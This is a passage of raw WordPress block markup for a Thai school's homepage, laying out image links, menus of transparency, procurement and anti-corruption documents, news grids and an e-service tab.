class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"54d1190a\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1704\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1754\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1697\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1594\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a></td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_bd7bab-81\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_a02c00-db\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_a02c00-db\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8cac31-6c\",\"tabCount\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8cac31-6c kt-tabs-has-2-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"48d9e9-20\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab48d9e9-20\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1643,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure 